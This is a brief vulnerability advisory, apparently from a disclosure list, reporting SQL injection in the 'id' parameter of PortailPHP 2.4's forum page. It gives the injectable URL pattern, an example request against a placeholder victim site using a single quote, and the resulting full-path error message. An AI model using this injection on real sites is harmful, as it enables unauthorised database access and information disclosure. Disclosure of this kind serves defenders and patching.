Class: Input Validation Error CVE: CVE-MAP-NOMATCH Remote: Yes Local: yes Credit: ABDUCTER ---> ABDUCTER_MINDS@xxxxxxxxx [OR] ABDUCTER_MINDS76@xxxxxxxxxxx Vulnerable: PortailPHP 2.4 and all version *************************************** info :- PortailPHP POWERFUL FORUM AND formal site http://www.portailphp.com/ there is sql in index.php *************************************** discussion :- sql in indwx.php make an error in database and appear full path informathion like that (Warning: mysql_result(): Unable to jump to row 0 on MySQL result index 34 in /home/httpd/vhosts/***/httpdocs/portailphp/mod_forum/read_mess.php on line 14) **************************************** exploit:- index.php?affiche=Forum-read_mess&id=[sql] example www.victim.com/portailphp/index.php?affiche=Forum-read_mess&id=' ***************************************** CREDITS :- FOR ALL ARAB {EGYPT} WWW.S4A.CC TO MY LOVE (N0N0)
